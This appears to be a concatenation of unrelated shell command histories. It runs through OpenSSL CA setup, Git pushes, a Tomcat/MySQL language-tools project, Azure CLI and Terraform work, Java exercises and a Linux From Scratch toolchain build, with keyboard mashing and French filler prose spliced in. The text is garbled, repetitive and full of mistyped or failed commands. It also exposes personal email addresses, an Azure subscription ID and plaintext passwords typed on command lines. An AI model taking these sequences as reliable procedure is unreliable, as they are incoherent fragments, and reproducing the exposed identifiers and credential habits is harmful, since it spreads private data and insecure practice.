ca/int-ca.conf +ls +ls +ls +ls +mkdir certs +ls +ls .. +ls ../.. +ls +ls +ls .. +ls ../.. +ls +ls +ls +ls .. +ls +ls +ls certs/ +ls crl/ +ls +ls +ls +ls db/ +ls +ls +ls +ls +cp /dev/null /root/ca/root-ca/db/root-ca.db +cp /dev/null /root/ca/root-ca/db/root-ca.db.attr +cp /dev/null /root/ca/root-ca/db/root-ca.crt.srl +cp /dev/null /root/ca/root-ca/db/root-ca.crl.srl +ls +mkdir newcert +mmv newcert newcerts +mv newcert newcerts +ls +ls +ls +ls +ls .. +ls ../root-ca/db/ +ls +ls +cp /dev/bus/ db/int-ca.db +cp -r /dev/bus/ db/int-ca.db +cp -r /dev/bus/ db/int-ca.db.attr +cp -r /dev/bus/ db/int-ca.db.attr +cp -r /dev/bus/ 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int-ca.csr -keyout int-ca/private/int-ca.key +ls +ls int-ca +ls int-ca/db/ +openssl req -new -config int-ca.conf -out int-ca.csr -keyout int-ca/private/int-ca.key +ls +rm int-ca.csr +rm int-ca/private/int-ca.key +cat int-ca/db/int-ca.db +cat int-ca/db/int-ca.crt.srl +openssl req -new -config int-ca.conf -out int-ca.csr -keyout int-ca/private/int-ca.key +ls +openssl ca -conffig root-ca.conf -in int-ca.csr -out int-ca/certs/int-ca.crt -extensions signing_ca_ext +openssl ca -config root-ca.conf -in int-ca.csr -out int-ca/certs/int-ca.crt -extensions signing_ca_ext +ls +ls +ls +ls certs/ +ls crl/ +rm certs/ +rm -rf certs/ crl +ls +shutdown -h now +l +ls +ifconfig +ifdown ens37 +ifup ens37 +shutdown -h now +ls +ls +git init +git add . +git commit +ls +ls +cp ca ca.backup +cp -r ca ca.backup +ls +ls ca.backup/ +git commit +git config user.name "Léon GOTO" +git config user.email "leongoto97@gmail.com" +git commit +apt-get install vim +git commit -m pki_fonctionnelle +git remote +git show-branch +git remote show +git remote add ca_project +git remote +git branch -r +ls +ls -la +ls .git/ +ls .git/branches/ +cat .git/branches/ +cat .git/HEAD +cat .git/index +ls .git/branches/ +ls .git/ +cat .git/refs/heads/master +cat .git/refs/tags/ +ls .git/refs/tags/ +ls +git status +ls +git fetch ca_project +git fetch ca_project +ls +ls +mkdir git_test +ls +git init +git add . +git fetch +ls +git branch +git commit +git commit -m ok +git config user.name "Leon" +git commit -m ok +git config user.email "leongoto97@gmail.com" +git commit -m ok +ls +git clone +ls +ls ca_project/ +rm ca_project/ +rm -rf ca_project/ +ls +ls +ls .git/ +vim .git/config +ls .git/ +git push ca_project +git push ca_project master +git pull ca_project HEAD +git push ca_project master --force +git push ca_project master +git pull ca_project master +ls +touch toto.txt +git pull ca_project master +git add . +git pull ca_project master +git commit -m PKI +git pull ca_project master +git pull ca_project master +git diff ca_project/master master +rm toto.txt +git diff ca_project/master master +git commit -m PKI +git diff ca_project/master master +git add . +git commit -m PKI +git diff ca_project/master master +shutdown -h now +ls +ls +git push ca_project master +shutdown -h now +shutdown -h now +ls +git push ca_project master +ls +ls +clear +ls +shutdown -h now +git add * +git init +git add * +git commit -m "first commit" +git config --global user.email "you@examp.com" +git config --global user.name "Your Name" +git add * +git commit -m"first commit" +git remote add origin git@github.com:qinzhiaho/GRWY.git +git push -u origin master +git remote add origin +ps -ef | grep mysql +vi /etc/my.cnf.d/server.cnf +ls +ls +cat client.cnf +cat mysql-clients.cnf +ls +ls +ps -ef | grep mysql +service mysql stpp +service mysql stop +sudo service mysql stop +ps -ef | grep mysql +. +/etc/init.d/mysqld stop +ls /etc/init.d/ + +sudo service mysqld stop +sudo service mysql stop +ls +ls +history +ps -ef | grep mysql +./test_run helabasa.test.HBKBTester +mysql -u priyanga -p +mysql -u helabasa -p +./test_run helabasa.test.HBKBTester +history +ls +ls +mkdir data +s +ls +vi join_test_data.csv +pwd +ls +./test_run helabasa.test.HBJoinTester /home/priyanga/data/join_test_data.csv +ifconfig +ls +ls +hb +./hb +ls +ls +vi refresh_hb +ps -ef | grep tomcat +sudo service tomcat7 stop +sudo service tomcat stop +ps -ef | grep tomcat +sudo service tomcat stop +ps -ef | grep tomcat +sudo service tomcat stop +sudo service tomcat6 stop +sudo service tomcat stop +ps -ef | grep tomcat +cat refresh_hb +sudo /etc/init.d/tomcat7 restart +sudo /etc/init.d/tomcat restart +sudo /etc/init.d/tomcat6 restart +./refresh_hb +vi refresh_hb +./refresh_hb +chkconfig --list +systemctl list-unit-files +top +./refresh_hb +./refresh_hb +./refresh_hb +ls +ls +ls +ls +ls +vi NounConjugator.java +top +work/ +l;s +ls +./refresh_hb +ls +./refresh_hb +top +./refresh_hb +ls +./refresh_hb +ls +ls -l +ls +ls +vi web.xml +ls -l +sudo vi web.xml +ls +vi server.xml +ls +ls +./refresh_hb +./test_build +ls +./refresh_hb +mysql -u priyanga -p +ls +ls +mysql -u priyanga -p +ls +ls +ls +cat helabasa.sql + +vi helabasa.sql +mysql -u priyanga -p +ls +ls +./test_build +./test_build helabasa.test.HBRegUser priyanga mit123 1 +vi test_run +ls +./test_build helabasa.test.HBRegUser priyanga mit123 1 +ls +xd helabasa/ +ls +ls +ls +cat helabasa.sql +ls +mysql -u priyanga -p +ls +ls +./test_build +cat test_run +history +./test_build helabasa.test.HBRegUser priyanga mit123 1 +./test_run helabasa.test.HBRegUser priyanga mit123 1 +./test_run helabasa.test.HBRegUser gihan cse123 1 +./test_run helabasa.test.HBRegUser nimasha dil123 2 +./test_run helabasa.test.HBRegUser surangika cse123 2 +./refresh_hb +mysql -u priyanga -p +ls +ls +ls +ls +vi Sandhi.java +ls + +exit +./refresh_hb +./test_n +./test_b +./test_build +ls +./refresh_hb +./refresh_hb +history +ls +ls +./db +ls +./refresh_hb +~/scripts/db +history + +top +ps -ef | grep tomcat +ls /usr/local/tomcat7/ +ls /usr/local/tomcat7/temp/ +cat /usr/local/tomcat7/temp/safeToDelete.tmp +ls /usr/local/tomcat7/temp/safeToDelete.tmp +ls /usr/local/tomcat7/temp/safeToDelete.tmp -lh +./test_build helabasa.test.HBKBTester +./test_build helabasa.test.HBKBTester +./test_run helabasa.test.HBKBTester +./test_build +./test_run helabasa.test.HBKBTester +./refresh_hb +exit +cexit +exit +ls +ls +./test_build +history +mysql -u helabasa -p @hlbs +mysql -u helabasa -p helabasa +exit +mysql -u helabasa -p helabasa +ls + +cat hb +cat db +vi db +./db +ls +cat db +vi db +ls +./db +exit +./refresh_hb +ls +./refresh_hb +ls +top +exit +./refresh_hb +./refresh_hb +./refresh_hb +ls +psu +ps +ls +ls +top +ls +ls +./refresh_hb +top +ls +top +ls +ls -l +ls +ls +vi RUNNING.txt +ls +vi server.xml +ls +vi web.xml +ls -l +vi web.xml + +ls +vi refresh_hb +./refresh_hb +ls -l +ls -l +ls +./refresh_hb +ls +ls -l +ls -l +ls +ls +ls +ls +ls +vi server.xml +ls +vi web.xml +sudo vi web.xml +ls +ls +ls -l +ls +ls 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+cat refresh_hb +sudo /opt/tomcat/bin/shutdown.sh +sudo /opt/tomcat/bin/startup.sh +psu +top +l +ls +ls -l +ls -l +ls +ls -l +chmod +R g+x helabasa +chmod -R g+x helabasa +ls +ls -l +chmod -R 755 helabasa +ls +ls -l +sudo chmod -R 755 helabasa +ls -l +ls +ls -l +ls -l +ls +ls +ls +ls -a +ls -l +TDC +tomcat7 +tomcat +tomcat8 +which tomcat8 +ls +ls +ls -l +ls +vi conf/ +ls +vi server.xml +vi web.xml +sudo web.xml +sudo vi web.xml +ls +ls +ls -a +ls +ls -a +ls +ls -a +vi web.xml +ls -a +ls -ls +ls +who +ls -l +ls +ls +ls -l +ls +ls +vi context.xml +ls +ls +ls -l +ls +ls -l +ls +ls +ls +cp ../index.html . +sudo cp ../index.html . +ls -l +ls +cat refresh_hb +sudo /opt/tomcat/bin/shutdown.sh +sudo /opt/tomcat/bin/startup.sh +ls +ls +ls +rm index.html +sudo rm index.html +ls +ls -l +ls +ls +ls +s +ls +ls +ls -lh +ls +ls +ls +ls +ls +ls +vi catalina.out +ls -lr +ls -ltr +ls -lh +ls -ltr +ls -ltrh +vi catalina.out +q +: +ls +date +ls -ltr +ls +ls +ls +ls +ls -ltr +ls +bi index.html +cat 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/usr/local/tomcat7/webapps/helabasa . +ls +ls +rm admin.html corpus_search.txt +ls +cat corpus_search.html +ls +cat corpus_search.txt +ls +rm corpus_search.txt +ls +sudo rm corpus_search.txt +ls +ls +ls +./refresh_hb +./test_build +./test_run helabasa.test.HBConjugationTester +:q +./test_run +./test_run helabasa.test.HBConjugationTester +./test_run helabasa.test.HBConjugationTester > harak.out +vi harak.out +ls +./test_build +./test_run helabasa.test.HBConjugationTester > harak.out +vi harak.out +ls +./refresh_hb +history +./test_build +./test_run helabasa.test.HBConjugationTester +./test_run helabasa.test.HBConjugationTester > harak.out +vi harak.out +./test_run helabasa.test.HBConjugationTester > harak.out +vi harak.out +ls +./refresh_hb +./test_build +./test_run helabasa.test.HBConjugationTester > harak.out +vi harak.out +ls +history +ls +ls +ls +vi server.xml +vi web.xml +sudo vi web.xml +ls +sudo vi context.xml +ls +ls +ls +ls +vi web.xml +ls +ls +ls +ls +ls +ls +vi web.xml +ls -l +ls +ls +ls +vi server.xml +sudo vi server.xml +vi web.xml +sudo web.xml +sudo vi web.xml +d +ls +ls +ls +ls +ls +vi Helabasa.java +vim Helabasa.java +vim: set fileencoding=utf-8 : +vim : set fileencoding=utf-8 : +vi ~/.vim +vi ~/.vimrc +source ~/.vimrc +vim Helabasa.java +:q +ls +ls +sudo vi server.xml +sudo vi web.xml +ls +ls +ls +ls +ls +ls +cp ~/work/WebUtils.java . +./refresh_hb +ls +ls +ls +db +./db +ls +./refresh_hb +ls +vi gen_conj_test_data +ls +chmod +x gen_conj_test_data +ls +./gen_conj_test_data + +vi conj_test.csv +./test_build +./gen_conj_test_data +top +ls +ls +tail -f conj_test.csv +ls +cat conj_test.csv +ls +./refresh_hb +ls +ls +ls +exit +uname -a +w +ls -a +ls -a +wget +passwd +exit +help +az +help +az +exit +ifconig -a +ssh +pwd +ls +vi id_rsa +ls -la +idf +id +touch id_rsa +vi id_rsa +chmod 600 id_rsa +history +ls +ssh root@ +ssh pknw1@ +exit# +ssh pknw1@ +? +help +az help +# +az account show +az subsxcription show +az subscription show +az account help +az subscriptions help +az account set --subscription="aa4258da-1f5a-4595-8ffd-6588461d65b8" +az account show --query "{subscriptionId:id, tenantId:tenantId}" +az ad sp create-for-rbac --role="Contributor" --scopes="/subscriptions/aa4258da-1f5a-4595-8ffd-6588461d65b8" +az +? +ssh +ssh +ssh +curl +history +resource "azurerm_resource_group" "test" { +}az account set --subscription="aa4258da-1f5a-4595-8ffd-6588461d65b8" +az account set --subscription="aa4258da-1f5a-4595-8ffd-6588461d65b8" +history +resource "azurerm_resource_group" "test" { +}az account show --query "{subscriptionId:id, tenantId:tenantId}" +az account show --query "{subscriptionId:id, tenantId:tenantId}" +pwd +ls +ls +pwd +vi test.tf +pwd +mkdir tf +vi a.tf +vi a.tf +sed -i 's/\#//g' a.tf +vi a.tf +az ad sp create-for-rbac --role="Contributor" --scopes="/subscriptions/aa4258da-1f5a-4595-8ffd-6588461d65b8" +vi a.tf +cp a.tf a2.tf +vi a2.tf +terraform init +terraform -install-autocomplete +terraform +terraform plan a2.tf +terraform apply a2.tf +vi a2.tf +terraform plan +vi a2.tf +terraform a2.tf +ls +terraform init +vi test.tf +terraform init +terraform plan +terraform apply +cat te +cat test.tf +az login +pwd +ls +vi test.rf +ls +terraform init +az info +az provider +az provider show +history +az help +az interactive -ter +az interactive +az account list --output table +terraform plan ./test.tf +vi test.tf +cat test. +cat test.tf +vi test.tf +terraform plan ./test.tf +terraform plan +vi test.tf +terraform ini +terraform init +terraform play +terraform plan +terraform aspply +terraform apply +az +jaz account +az account +az account show +ls +cat test.tf +vi test.tf +terraform help +terraform destroy +terraform init +tarraform plan +terraform plan +terraform apply +vi test.tf +terraform init +terraform plan +terraform destroy +terraform apply +terraform destroy +ls +vi test.tf +ls +terraform init +terraform help +terraform plan +vi test.tf +/usr/bin/vi test.tf +terraform plan +terraform apply +ls +vi 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+vi variables.tf +terraform plan +vi variables.tf +vi main.tf +terraform plan +terraform destroy +ls +cat run.sh +ls +cat main.tf +ls +cat main.tf +ls +vi location +vi main.tf +terraform destroy +terraform apply +env | grep TF +export TF_VAR_location="West Europe" +export TF_VAR_project_name="VCAP" +export TF_VAR_resource_group_name="RG-AMS-${TF_VAR_project_name}" +echo $TF_VAR_resource_group_name +vi main.tf +terraform plan +vi main.tf +ls +cat variables +pwd +mkdir terraform +mkdir docker +#cd docker +ls +vi run.sh +ls +mv run.sh docker/ +ls +cat run.sh +cat ../../rg/main.tf +ls +vi main.tf +chmod +x run.sh +./run.sh +terraform init +vi variables.tf +terraform init +vi variables.tf +vi ruin +vi run.sh +terraform init +terraform plan +terraform apply +ls +cat main.tf +ls +vi 01.tf +terraform destroy +terraform plan +terraform planls +ls +cat main.tf +cat 01.tf +cat 01.tf |grep andom +terraform plan +terraform init +terraform plan +az acount set --subscription="aa4258da-1f5a-4595-8ffd-6588461d65b8" +az account set --subscription="aa4258da-1f5a-4595-8ffd-6588461d65b8" +az ad sp create-for-rbac --role="Contributor" --scopes="/subscriptions/aa4258da-1f5a-4595-8ffd-6588461d65b8" +az account list +az account list | egrep "cloudName|id" +az account list | egrep "cloudName" +A3 +az account list | grep "cloudName" +A3 +az account list | grep "cloudName" -A3 +az account list | grep "cloudName" -A2 +az account list | grep "cloudName" -A1 +az account list +az account list | egrep "cloudName|name" +az account list | egrep "id|name" +az account list | egrep "id|name" | tr +tr +tr =--help +tr --help +az account list | egrep "id|name" | tr ',' ' +' +az account list | egrep "id|name" | tr ',' '\b' +az account list | egrep "" | tr ',' '\b' +az account list | egrep "id" -A2| tr ',' '\b' +az account list | egrep "id" -A2| grep -v isDefault| tr ',' '\b' +az account list | egrep "id" -A2| grep -v isDefault| tr ',' '\b' | sed 's/-/PK/g' +az account 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"//g;s/",//g'; | while read -r line; do echo $i; i++; done +az account list | egrep "id" -A2| grep -v isDefault | sed 's/ "id": "//g;s/ "name": "//g;s/",//g'; | while read -r pk; do echo $pk; done +az account list | egrep "id" -A2| grep -v isDefault | sed 's/ "id": "//g;s/ "name": "//g;s/",//g'| while read -r pk; do echo $pk; done +az account list | egrep "id" -A2| grep -v isDefault | sed 's/ "id": "//g;s/ "name": "//g;s/",//g'| while read -r pk; do i++; echo $i; done +az account list | egrep "id" -A2| grep -v isDefault | sed 's/ "id": "//g;s/ "name": "//g;s/",//g'| while read -r pk; do i=i++; echo $i; done +export i=0 +az account list | egrep "id" -A2| grep -v isDefault | sed 's/ "id": "//g;s/ "name": "//g;s/",//g'| while read -r pk; do ((i++)); echo $i; done +az account list +az account list | grep id +clerar +az account set --subscription="aa4258da-1f5a-4595-8ffd-6588461d65b8" +az ad sp create-for-rbac --role="Contributor" --scopes="/subscriptions/aa4258da-1f5a-4595-8ffd-6588461d65b8" +pwd +ls +history +LS +ls +ls +;s +ls +vi 01.tf +terraform destroy +ls +cat 01.tf +vi 01.tf +vi 02.TFD +vi 02.tf +ls +ls -la +rm .02.tf.swp +vi 02.tf +terraform init +vi 02.tf +terraform init +terraform plan +cat variables.tf +vi variables.tf +terraform plan +vi variables.tf +vi 02.tf +vi 01.tf +terraform plan +ls +ls +cat 01.tf +az login +az account list +az helop +az +az accouint id +az account +az account show +az account set --subscription="aa4258da-1f5a-4595-8ffd-6588461d65b8" +az ad sp create-for-rbac --role="Contributor" --scopes="/subscriptions/aa4258da-1f5a-4595-8ffd-6588461d65b8" +az account list +az account l +az show identity +az identity +az identity show +az identity list +ls +cat 01.tf +terraform --help +terraform +terraform init +ls +cat 01.tf +ls +cat 02.tf +ls +cat 02.tf +ls +mkdir v1 +vi 1.tf +cat 1.tf | grep $ +cat 1.tf | grep "${" +cat 1.tf | grep "\${" +cat 1.tf | grep "\${" | awk -F\= '{pront $2}' +cat 1.tf | grep "\${" | awk -F\= '{print $2}' +cat 1.tf | grep "\${" | awk -F\= '{print $2}' | sort | uniq +cat 1.tf | grep "var." | awk -F\= '{print $2}' | sort | uniq +cat 1.tf | grep "var." | awk -F\= '{print $2}' | sort | uniq | sed 's/\"{var.//g' +cat 1.tf | grep "var." | awk -F\= '{print $2}' | sort | uniq | sed 's/\$"{var.//g' +cat 1.tf | grep "var." | awk -F\= '{print $2}' | sort | uniq | sed 's/$\"{var.//g' +cat 1.tf | grep "var." | awk -F\= '{print $2}' | sort | uniq | sed 's/"//g' +cat 1.tf | grep "var." | awk -F\= '{print $2}' | sort | uniq +cat 1.tf | grep "var." | awk -F\= '{print $2}' | sort | uniq | sed 's/"${var.//g' +vi 1.tf +cat 1.tf | grep "var." | awk -F\= '{print $2}' | sort | uniq | sed 's/"${var.//g' +cat 1.tf | grep "var." | awk -F\= '{print $2}' | sort | uniq | sed 's/"${var.//g;s/}"//g' +cat 1.tf | grep "var." | awk -F\= '{print $2}' | sort | uniq | sed 's/"${var.//g' +vi 1.tf +terraform init +cat 1.tf | grep "var." | awk -F\= '{print $2}' | sort | uniq | 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+git commit -m "first commit" +git remote add origin +git config --global user.email "pk@pknw1.co.uk" +git config --global user.name "pk" +git remote add origin +rm -rf .git/ +git init +git add . +got commiot -m "1" +got commit -m "1" +git commit -m "1" +git remote add origin +git push -u origin master +vi ~/.ssh/config +chmod 600 ~/.ssh/config +vi ~/.ssh/gitlab_io +chmod 600 ~/.ssh/gitlab_io +git push -u origin master +exit +ls +git push -u origin master +vi ~/.ssh/config +git push -u origin master +rm -rf .git +git init +git add . && git commit -m "1" +git remote add origin git@github.com:pknw1/terraform.git +git push -u origin master +terraform plan +git add . && git commit -m "1" +gitr add . +git add . +ls +;ls -la +ls-la +terraform plan --help +terraform plan -out=~ +ls +apt-get update && apt-get upgrade +sudo add-apt-repository ppa:webupd8team/java +sudo apt update; sudo apt install oracle-java8-installer +javac Hello.java +wget -qO -sublimetext.com/sublimehq-pub.gpg | sudo apt-key add - +echo "debsublimetext.com/ apt/stable/" | sudo tee /etc/apt/sources.list.d/sublime-text.list +sudo apt-get update +sudo apt-get install sublime-text +gedit .local/share/applications/eclipse.desktop +javac Hello.java +java Hello +gedit .local/share/applications/eclipse.desktop +sudo apache2ctl configtest +sudo nano /etc/apache2/apache2.conf +sudo apt-get install apache2 +sudo apt-get install mysql-server +sudo apt-get install php5 libapache2-mod-php5 +sudo /etc/init.d/apache2 restart +php -r 'echo " + +Your PHP installation is working fine. + + +";' +./xampp-linux-x64-5.6.24-1-installer.run +./xampp-linux-x64-5.6.24-1-installer.run +sudo:Downloads +sudo +sudo cd/Mueed/Home/Downloads +./xampp-linux-x64-5.6.24-1-installer.run +sudo ./xampp-linux-x64-5.6.24-1-installer.run +sudo /opt/lampp/lampp start +sudo apt-get install lamp-server^ +sudo chmod +x xampp-linux-x64-7.1.7-0-installer.run +sudo chmod +x xampp-linux-x64-5.6.33-0-installer.run +sudo su +sudo /opt/lampp/lampp start +sudo /opt/lampp/lampp stop +sudo /opt/lampp/lampp start +$sudo apt-get install lamp-server^ +xampp-linux-x64-5.6.24-1-installer.run +sudo apt-get install lamp-server^ +sudo chmod +x xampp-linux-x64-7.2.2-0-installer.run +sodu su +sudo su +sudo chown Mueed:Mueed /opt/lampp/htdocs +sudo chown mueed:Mueed /opt/lampp/htdocs +sudo chown mueed:mueed /opt/lampp/htdocs +sudo /opt/lampp/lampp start +sudo /opt/lampp/lampp stop +sudo /opt/lampp/lampp start +sudo /etc/init.d/apache2 stop +sudo /opt/lampp/lampp start +sudo /etc/init.d/apache2 stop +sudo /opt/lampp/lampp stop +sudo /opt/lampp/lampp start +sudo /opt/lampp/lampp stop +javac ThisKey.java +java ThisKey +javac ThisKey1.java +java ThisKey1 +javac Test.java +java Test +cls +javac Technology.java +Technology java +java Technology +javac ChildSuper.java +java ChildSuper +javac Demo.java +java Deno +java Demo +javac Simp.java +java Simp +javac Const2.java +java Const +java Const2 +java Demo +apt-get install git-core +N +Y +open +sudo apt-get update +sudo apt-get install git +sudo apt-get autoremove +sudo rm /etc/apt/sources.list +sudo software-properties-gtk +sudo apt-get update && sudo apt-get dist-upgrade -y +sudo apt-get install git +sudo apt-get install git-core +sudo apt-get update +sudo apt-get install build-essential libssl-dev libcurl4-gnutls-dev libexpat1-dev gettext unzip +sudo apt install git +git--version +git --version +echo "# MyStyling" >> README.md +git init +git add README.md +" + +git add README.md +git commit -m "basic programs" +git push -u origin master +echo "# MyStyling" >> README.md +git init +git add Const2.java.md +git add Const2.java +git commit -m "Basic" +git config -- user.email "Muedkhn@gmail.com +git config --user +clear +git commit -m "basics" +git config Muedkhn@gmail.com +git config --Muedkhn@gmail.com +git config --"Muedkhn@gmail.com" +git config "Muedkhn@gmail.com" +git config --user.email"Muedkhn@gmail.com +git init +clear +echo "# MyStyling" >> README.md +git init +git add README>md +git add README.md +git commit -m "Hello" +git config --MueedKhan.email "Muedkhn@gmail.com +git config --MueedKhan.name "Mueed Khan" + + + + + + + + + + + +git commit -m "Hellos" +git config --global user.email "Muedkhn@gmail.com" +git config --global user.name "Mueed Khan" +git remote add origin +git push -u origin master +git commit -m "Initial" +git push -u origin master +git add Simp.java +git commit -m "Good Prog" +git push -u origin master +sudo /opt/lampp/lampp start +sudo /opt/lampp/lampp stop +sudo /opt/lampp/lampp start +sudo /etc/init.d/apache2 stop +sudo /opt/lampp/lampp stop +sudo /opt/lampp/lampp start +sudo /opt/lampp/lampp stop +javac Dispatch.java +java Dispatch +javac AmbigiousDemo.java +java Ambigious +javac AmbigiousDemo.java +java AmbigiousDemo +javac AmbigiousDemo.java +java AmbigiousDemo +javac Shoe.java +java Shoe +javac Shoe.java +java Shoe +javac Shoe.java +java Shoe +javac Shoe.java +java Shoe +javac Shoe.java +clear +javac Shoe.java +java Shoe +javac C.java +java C +javac Test2.java +java Test2 +javac Test2.java +java Test2 +javac Shoe.java +java Shoe +javac Shoes.java +java Shoes +javac Shoes.java +java Shoes +javac Shoes.java +java Shoes +javac Shoes.java +java Shoes +javac Shoes.java +java Shoes +clear +javac Shoes.java +java Shoes +javac Shoes.java +java Shoes +javac Pizza.java +java Pizza +javac PizzaPrac.java +java PizzaPrac +javac ApplyLoan.java +java ApplyLoan +javac ApplyLoan.java +java ApplyLoan +javac ApplyLoan.java +java ApplyLoan +javac ApplyLoan.java +java ApplyLoan +javac ApplyLoan.java +java ApplyLoan +javac ApplyLoan.java +java ApplyLoan +javac ApplyLoan.java +java ApplyLoan +javac ApplyLoan.java +java ApplyLoan +javac ApplyLoan.java +java ApplyLoan +javac ApplyLoan.java +java ApplyLoan +javac ApplyLoan.java +java ApplyLoan +javac ApplyLoan.java +java ApplyLoan +javac ApplyLoan.java +java ApplyLoan +javac ApplyLoan.java +java ApplyLoan +javac ApplyLoan.java +java ApplyLoan +javac ApplyLoan.java +java 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+dasfsd +asd +sdf +asd +f +sdf +sd +f +asd +f +asd +f +sad +f +sd +g +f +h +j +jk +ghjk +ghj +k +t +s + +Bienvenue chez les professionnels de l'impôt et des services comptables. Depuis déjà plusieurs années, vous pouvez obtenir un service de la plus haute qualité offert à un prix raisonnable. La fidélité de nos clients nous permet de nous concentrer sur la qualité de nos services. Venez parcourir avec nous le chemin de votre réussite fiscale! + + + +; +; +; +; + + +Le Carolina Marsh Tacky, Marsh Tacky ou simplement Tacky, est une race chevaline rare, native de Caroline du Sud aux États-Unis. Il descend du cheval colonial espagnol, et se révèle proche du Florida Cracker et du cheval des Outer Banks de Caroline du Nord. Son origine remonte au moins à 400 ans. +Ce petit cheval est bien adapté aux marais des plaines de sa Caroline du Sud natale. Le Marsh Tacky a été développé à partir de chevaux espagnols amenés sur la côte par les explorateurs, les colons espagnols et les commerçants dès le XVIe siècle. Les chevaux ont été utilisés par les colons pendant la Révolution américaine, puis pour les travaux agricoles, l'élevage du bétail et la chasse tout au long de l'histoire de la race. +Elle est considérée comme étant en danger critique d'extinction, à la fois par l’American Livestock Breeds Conservancy et Equus Survival Trust. Il reste seulement 276 spécimens en 2011. En 2006 et 2007, les deux organisations de race ont travaillé ensemble à la réalisation de tests d'ADN, avec pour objectifs de déterminer la place du Tacky Marsh parmi les races de chevaux du monde, et d'établir un stud-book. En 2007, une association a été créée dans le but de préserver et de promouvoir le Marsh Tacky. En 2010, un stud book fermé a été mis en place. + + + + + +" +. +' +Elle est considérée comme étant en danger critique d'extinction, à la fois par l’American Livestock Breeds Conservancy et Equus Survival Trust. Il reste seulement 276 spécimens en 2011. En 2006 et 2007, les deux organisations de race ont travaillé ensemble à la réalisation de tests d'ADN, avec pour objectifs de déterminer la place du Tacky Marsh parmi les races de chevaux du monde, et d'établir un stud-book. En 2007, une association a été créée dans le but de préserver et de promouvoir le Marsh Tacky. En 2010, un stud book fermé a été mis en place. + +. +. +. +. +' +Le Carolina Marsh Tacky, Marsh Tacky ou simplement Tacky, est une race chevaline rare, native de Caroline du Sud aux États-Unis. Il descend du cheval colonial espagnol, et se révèle proche du Florida Cracker et du cheval des Outer Banks de Caroline du Nord. Son origine remonte au moins à 400 ans. +cat .bash_history +exit +ls +cat .bash_history +ls +ls -la +cat .viminfo +vi me +ls +make -C gnulib-lib +make -C intl pluralx.c +make -C src msgfmt +make -C src msgmerge +make -C src xgettext +sudo git status +cp -v src/{msgfmt,msgmerge,xgettext} /tools/bin +sudo git status +rm -r gettext- +sudo git status +sudo git add ../tools/ +sudo git status +sudo git commit -m "After building 5.23 - Gettext" +sudo git push +tar xvf grep-2.21.tar.xz +ls +./configure --prefix=/tools +make +make check +make install +sudo git status +rm -r grep-2.21 +sudo rm -r grep-2.21 +sudo git status +cat ../tools/share/info/dir +sudo git diff ../tools/share/info/dir +sudo git status +sudo git add ../tools/ +sudo git status +sudo git push +sudo git commit -m "After building 5.24 - Grep." +sudo git push +tar xvf gzip-1.6.tar.xz +ls +./configure --prefix=/tools +make +make check +make install +sudo git status +sudo rm -r gzip-1.6 +sudo git add ../tools/ +sud git status +sudo git status +sudo git commit -m "After building 5.25 - Gzip." +sudo git push +tar xvf m4-1.4.17.tar.xz +ls +./configure --prefix=/tools +make +make check +sudo git status +make install +sudo git status +rm -r m4-1.4.17 +sudo git status +sudo git add ../tools/ +sudo git status +sudo git commit -m "After building 5.26 - M4." +sudo git push +tar xvf make-4.1.tar.bz2 +ls +./configure --prefix=/tools --without-guile +make +make check +ls +ls make +ls -lh make +date +make install +sudo git status +sudo rm -r make-4.1 +sudo git status +sudo git add ../tools/ +sudo git status +sudo it commit -m "After building 5.27 - Make." +sudo git log +sudo git commit -m "After building 5.27 - Make." +sudo git push +tar xvf patch-2.7.5.tar.xz +ls +./configure --prefix=/tools +make +make check +make install +sudo git status +rm -r patch-2.7.5 +sudo git status +sudo git add ../tools/ +sudo git commit -m "After building 5.28 - Patch." +sudo git push +tar xvf perl-5.22.0.tar.bz2 +ls +vi sh +ls -lha sh +sh Configure -des -Dprefix=/tools -Dlibs=-lm +make +cp -v perl cpan/podlators/pod2man /tools/bin +mkdir -pv /tools/lib/perl5/5.22.0 +cp -Rv lib/* /tools/lib/perl5/5.22.0 +sudo rm -r perl-5.22.0 +sudo git status +sudo git add ../tools/ +sudo git commit -m "After building 5.29 - Perl." ../tools/ +sudo push +sudo git push +sudo git status +tar xvf sed-4.2.2.tar.bz2 +ls +./configure --prefix=/tools +make +make check +make install +sudo git status +sudo rm -r sed-4.2.2 +sudo git status +sudo git add ../tools/ +sudo git status +sudo git commit -m "After building 5.30 - Sed." +sudo git push +tar xvf tar-1.28.tar.xz +ls +./configure --prefix=/tools +make +make check +./configure --help +make install +sudo rm -r tar-1.28 +sudo git status +sudo git add ../tools/ +sudo git status +sudo git commit -m "After building 5.31 - Tar." +sudo git push +tar xvf texinfo-6.0.tar.xz +ls +./configure --prefix=/tools +make +make check +make install +sudo rm -r texinfo-6.0 +sudo git status +sudo git add ../tools/ +sudo git commit -m "After building 5.32 - Texinfo." +sudo git push +tar xvf util-linux-2.27.tar.xz +ls +./configure --prefix=/tools --without-python --disable-makeinstall-chown --without-systemdsystemunitdir PKG_CONFIG="" +make +make install +sudo rm -r util-linux-2.27 +sudo git status +sudo git diff ../tools/ +sudo git status +sudo git add ../tools/ +sudo git status +sudo git commit -m "After building 5.33 - Util-Linux." +sudo git push +tar xvf xz-5.2.1.tar.xz +ls +./configure --prefix=/tools +make +make check +make install +sudo rm -r xz-5.2.1 +sudo git status +sudo git add ../tools/ +sudo git commit -m "After building 5.34 - XZ." +sudo git status +sudo git push +sudo git log +df -h +ls +ls +ls +ls +mkdir 01062016 +ls +tar cvf ch5_nearly_done.tgz /lfs/tools/ +ls +du -sh ch5_nearly_done.tgz +df -h +ls +sudo poweroff +ls +ls +ls +strip --help +strip --strip-debug /tools/lib/* +df -h +/usr/bin/strip --strip-unneeded /tools/{,s}bin/* +m -rf /tools/{,share}/{info,man,doc} +rm --help +rm -vrf /tools/{,share}/{info,man,doc} +ls /tools//sbin +df -h +sudo git status +sudo git diff tools/bin/bash +sudo git status +sudo git commit -am "After 5.35 - Stripping and removing extraneous bits." +sudo git push +df -j +df -h +ls +chown -R root:root $LFS/tools +sudo chown -R root:root $LFS/tools +ls -lh $LFS/tools/ +du -sh /tools +ls +du -sh /tools/ +ls +df -h +ls +cp -r tools/ tools_at_ch5_end +sudo cp -r tools/ tools_at_ch5_end +ls +rm -r tools_at_ch5_end/ +sudo rm -r tools_at_ch5_end/ +ls +tar cvf tools_at_ch5_end tools/ +sudo tar cvf tools_at_ch5_end tools/ +ls +du -sh tools_at_ch5_end +rm tools_at_ch5_end +sudo rm tools_at_ch5_end +ls +ls -lh +du -sh tools/ +sudo tar cvf tools_at_ch5_end.tgz tools/ +ls +ls -lh tools_at_ch5_end.tgz +sudo git log +sudo 